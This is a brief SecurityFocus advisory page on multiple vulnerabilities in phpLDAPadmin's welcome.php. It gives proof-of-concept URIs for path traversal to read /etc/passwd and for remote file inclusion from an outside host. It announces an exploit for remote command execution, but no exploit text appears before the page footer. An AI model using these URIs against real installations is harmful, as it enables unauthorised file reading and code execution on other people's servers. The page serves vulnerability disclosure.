PHPLDAPAdmin Welcome.PHP Multiple Vulnerabilities

No exploit is required.

The following proof of concept URI are available:
http://www.example.com/phpldapadmin/welcome.php?custom_welcome_page=../../../../../../../../etc/passwd
http://www.example.com/phpldapadmin/welcome.php?custom_welcome_page=http://www.example.com/[malicious code]

Johnnie Walker <whisky[at]bsdmail[d0t]org> has supplied the following exploit for the remote command execution vulnerability:


 

Privacy Statement
Copyright 2010, SecurityFocus